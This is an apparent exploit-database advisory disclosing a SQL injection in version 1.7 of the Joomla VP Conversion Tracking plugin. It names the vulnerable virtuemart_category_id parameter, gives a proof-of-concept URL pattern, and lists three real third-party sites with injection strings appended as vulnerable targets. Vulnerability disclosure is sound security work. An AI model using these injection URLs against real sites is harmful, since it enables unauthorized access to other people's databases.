Joomla VP Conversion Tracking 1.7 SQL Injection

Joomla VP Conversion Tracking plugin version 1.7 suffers from a remote SQL injection vulnerability.


MD5 | 045a66e381bbf779e1bf0b0ed7570715

######################################################################
# Exploit Title: VP Conversion Tracking Plugin - SQL Injection Vulnerability
# Google Dork: N/A
# Date: 02.01.2018
# Author: Abde Ouabala (@AbdeOuabala)
# url : https://www.virtueplanet.com/extensions/vp-conversion-tracking
# Version : 1.7
# Tested on: BackBox Linux
#
######################################################################
#
# Description : plugin that helps you to track conversations of your Ads
from all advertising platforms like Google AdWords,
Facebook Ads, Shopper Approved Customer Survey, Bing Ads etc.
#
#
# Vulnerable Parameter : virtuemart_category_id
#
#
#POC: index.php?option=com_virtuemart&view=category&virtuemart_category_id=[SQL HERE(--)]

#
#Vuln Sites:

http://demos.virtueplanet.com/vm3/index.php?option=com_virtuemart&view=category&virtuemart_category_id=3"'--&lang=en&Itemid=151
https://www.nordmograph.com/extensions/index.php?option=com_virtuemart&view=category&virtuemart_category_id=20--&Itemid=58
https://www.oread.eu/index.php?option=com_virtuemart&view=category&virtuemart_category_id=45--

######################
# Discovered by : Abde Ouabala (https://www.facebook.com/Sh3ll.Inj3ctor)
# Greetz : Gaa3 Lhbab
######################

Related Posts

Comments